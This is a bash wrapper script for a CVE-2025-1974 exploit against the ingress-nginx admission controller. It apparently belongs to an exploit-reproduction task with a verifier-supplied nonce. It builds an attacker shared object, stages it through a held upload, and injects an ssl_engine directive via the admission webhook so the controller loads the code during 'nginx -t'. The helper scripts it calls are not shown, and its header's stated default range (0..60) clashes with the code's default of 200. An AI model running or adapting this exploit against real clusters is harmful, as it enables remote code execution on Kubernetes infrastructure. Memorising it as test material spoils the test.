#!/usr/bin/env bash
# CVE-2025-1974 single-entrypoint exploit.
#
#   run.sh <NONCE> <MARKER_PATH> <SECRET_REF> [N_MIN] [N_MAX]
#
#   <NONCE>        per-attempt nonce injected by the verifier; baked into the
#                  staged .so constructor and written to the marker on dlopen.
#   <MARKER_PATH>  controller-pod-local path the .so writes the nonce to
#                  (uid 101 writable, e.g. /tmp/<nonce>).
#   <SECRET_REF>   referenceable auth-tls ca.crt secret that opens the render
#                  gate: ingress-nginx/ingressnightmare-auth-ca
#   [N_MIN N_MAX]  optional brute-force range for the on-disk client-body
#                  counter N (default 0..60).
#
# Builds the musl/aarch64 engine .so (NONCE + MARKER baked in), then stages it
# via a held over-stated-Content-Length upload and injects ssl_engine through
# the admission webhook so the controller dlopen's it during `nginx -t`.
set -euo pipefail
HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"

NONCE="${1:?need NONCE}"
MARKER="${2:?need MARKER_PATH}"
SECRET_REF="${3:?need SECRET_REF}"
N_MIN="${4:-0}"
N_MAX="${5:-200}"

SO="$HERE/engine_${NONCE}.so"

echo "[run] building attacker engine .so (musl/aarch64) ..."
bash "$HERE/build_so.sh" "$NONCE" "$MARKER" "$SO"

echo "[run] staging + injecting ..."
python3 "$HERE/run.py" "$NONCE" "$MARKER" "$SECRET_REF" "$SO" "$N_MIN" "$N_MAX"

echo "[run] done. The marker should now exist at $MARKER inside the controller pod."